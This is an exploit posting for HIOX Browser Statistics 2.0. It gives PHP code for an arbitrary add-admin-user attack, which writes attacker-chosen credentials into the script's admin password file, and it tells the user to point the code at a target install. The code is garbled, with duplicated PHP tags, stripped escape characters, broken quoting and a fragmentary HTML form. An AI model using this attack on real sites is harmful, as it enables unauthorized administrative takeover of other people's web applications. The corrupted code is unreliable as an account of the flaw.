HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

<?php

@session_start();

<?php

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability

[~] Discoverd & exploited by Stack

[~]Greeatz All Freaind

[~]Special thnx to Str0ke

[~] Name Script : HIOX Browser Statistics 2.0

[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip

You need to change http://localhost/path/ with the link of script it's very importent

$creat = "true";

$iswrite = $_POST['createe'];

if($user=="" && $pass==""){

if($iswrite == "creatuser")

{

$usname = $_POST['usernam'];

$passwrd = md5($_POST['pword']);

if($usname != "" && $passwrd != ""){

$filee = "http://localhost/path/admin/passwo.php";

$file1 = file($filee);

$file = fopen($filee,'w');

fwrite($file, "<?php n");

fwrite($file, "$");

fwrite($file, "user="$usname";n");

fwrite($file, "$");

fwrite($file, "pass="$passwrd";");

fwrite($file, "n?>");

fclose($file);

$creat = "false";

echo "<div align=center ><b>New User Created

<br>Please Wait You will be Redirected to Login Page

</div>";

}

else{

echo "<div align=center ><b>Enter correct Username or Password </div>";

}

if($creat == "true"){

<tr width=400 height=20><td align=center bgcolor="000000"

style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">

Create New User </td></tr>

</td></tr>

<tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>

</table>

</form>

</td></tr></table>

<?php

}

}else{

echo "<div align=center ><b>User Already Exist</div>";

}

</td></tr></table>